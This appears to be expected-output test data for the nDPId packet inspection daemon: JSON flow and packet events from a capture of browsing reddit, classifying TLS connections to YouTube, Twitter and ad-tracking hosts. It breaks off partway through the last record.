+00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} +01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605291688336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688336,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzgAAAAAoAL9IOr4AAACBAWgBAIICn8mSxgAAAAAAQMDBw=="} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688344,"flow_last_seen":1605291688344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688344,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 